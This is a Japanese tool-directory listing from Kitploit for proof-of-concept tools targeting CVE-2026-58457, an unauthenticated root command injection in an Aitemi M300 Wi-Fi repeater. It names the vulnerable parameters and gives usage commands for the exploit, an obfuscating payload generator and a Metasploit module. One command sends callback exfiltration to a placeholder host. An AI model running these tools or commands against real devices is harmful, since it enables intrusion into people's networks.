Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-58457 — PoC tools for CVE-2026-58457: Unauthenticated OS Command Injection leading to remote root on Shenzhen Aitemi M300 Wi-Fi Repeater (MT02). Includes exploit, validator, payload generator, and Metasploit module. For educational and authorized pentesting only. | Kitploit
ツール/GitHubGitHub/j4ck3lsyn-gen2/cve-2026-58457
Exploit FrameworksIoT SecurityPayload GenerationVulnerability AnalysisExploitationWeb Application ExploitationWireless SecurityPenetration TestingCommand and Control

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
Learning & Education
GitHubj4ck3lsyn-gen2/cve-2026-58457

CVE-2026-58457

PoC tools for CVE-2026-58457: Unauthenticated OS Command Injection leading to remote root on Shenzhen Aitemi M300 Wi-Fi Repeater (MT02). Includes exploit, validator, payload generator, and Metasploit module. For educational and authorized pentesting only.

リポジトリを見る
21ヶ月前未レビュー

CVE-2026-58457 - 認証不要のOSコマンドインジェクション in Shenzhen Aitemi M300 Wi-Fi Repeater

[!WARNING] このコードは教育および研究目的でのみ現状のまま提供されます。 本PoCを本番システム、共有環境、または無許可のターゲットに対して使用しないでください。

  • このコードの実行またはホスティングは、誤用された場合にウイルス対策検出、セキュリティ監視アラート、または法的結果を引き起こす可能性があります。
  • 著者およびリポジトリ保守者は、本コードに起因するいかなる損害、誤用、または違法行為についても一切の責任を負いません。
  • 適切な許可を得た隔離されたラボ環境でのみ使用してください。 防御研究、脆弱性分析、ブルーチームテスト専用です。

脆弱性の概要

smacfilter_conf ハンドラに認証不要のOSコマンドインジェクションの脆弱性が存在します。name、enable、mac の GET パラメータがサニタイズされずに sprintf() 呼び出しに渡され、root として実行される UCI コマンドを構築します。

  • 深刻度: Critical (CVSS 9.8)
  • 影響: 認証不要でリモートルートコマンド実行

含まれるツール

  • poc.py - HTTPSサポート、リトライ、タイムアウト、コールバック流出機能を備えたフル機能のエクスプロイト。
  • val.py - 安全で受動的な脆弱性検証ツール(無害な id コマンドを使用)。
  • gen.py - 複数の難読化手法を備えた高度なペイロード生成ツール。
  • MITIGATIONS.md - 推奨される防御策。
  • Metasploit モジュール - exploit/ ディレクトリにあります。

インストール

root@kitploit:~
pip install requests

クイック使用方法

  1. 検証 (セーフ)
root@kitploit:~
python3 val.py --target 192.168.1.100
  1. エクスプロイト (許可されたテストのみ)
root@kitploit:~
python3 poc.py --target 192.168.1.100 --cmd "id"
python3 poc.py --target 192.168.1.100 --cmd "id" --callback http://your-ip:8080/
  1. 難読化ペイロードの生成
root@kitploit:~
python3 gen.py -c "id" -n 10

Metasploit

  1. モジュールの移動
root@kitploit:~
cp ./aitemi_m300_smacfilter_rce.rb ~/.msf4/modules/exploits/linux/http/
# またはメインのMSFパス: /usr/share/metasploit-framework/modules/exploits/linux/http/
  1. すべてをリロード
root@kitploit:~
msfconsole -q -x "reload_all"

参考情報

  • CVE-2026-58457
  • VulnCheck アドバイザリ
  • GitHub 公開情報

スターとコントリビューションを歓迎します - 特にバイパスの改善や追加ファームウェアバリアントへの対応。

ツールをダウンロード